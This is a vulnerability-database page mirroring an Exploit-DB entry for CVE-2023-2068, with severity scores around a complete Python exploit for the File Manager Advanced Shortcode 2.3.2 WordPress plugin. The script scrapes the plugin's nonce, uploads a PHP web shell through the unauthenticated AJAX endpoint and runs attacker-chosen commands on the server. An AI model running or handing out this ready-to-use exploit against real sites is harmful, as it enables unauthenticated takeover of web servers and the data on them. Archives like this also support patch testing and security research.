Lucene search

K
exploitdbMateus Machado TesserEDB-ID:51505
HistoryJun 04, 2023 - 12:00 a.m.

File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)

2023-06-0400:00:00
Mateus Machado Tesser
www.exploit-db.com
180
exploit
remote code execution
wordpress
linux
unauthenticated
security vulnerability
ajax
file manager

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.284 Low

EPSS

Percentile

96.9%

# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

try:
	COMMAND = sys.argv[2]
	IP = sys.argv[1]
	if len(COMMAND) > 1:
		pass
	if IP:
		pass
	else:
		print(f'Use: {sys.argv[0]} IP COMMAND')
except:
	pass

url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
print(f"{PROCESS} Searching fmakey")

try:
	r = requests.get(url)
	raw_fmakey = r.text
	fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
	if len(fmakey) == 0:
		print(f"{FAIL} Cannot found fmakey!")
except:
	print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")
if 'errUploadMime' in r.text:
	print(f'{FAIL} Exploit failed!')
	sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
	print(f'{FAIL} Exploit failed! Try to change _fmakey')
	sys.exit(0)
else:
	print(f'{SUCCESS} Exploit executed with success!')
exploited = json.loads(r.text)
url = ""
print(f'{PROCESS} Getting URL with webshell')
for i in exploited["added"]:
	url = i['url']
print(f"{PROCESS} Executing '{COMMAND}'")
r = requests.get(url+'?cmd='+COMMAND)
print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.284 Low

EPSS

Percentile

96.9%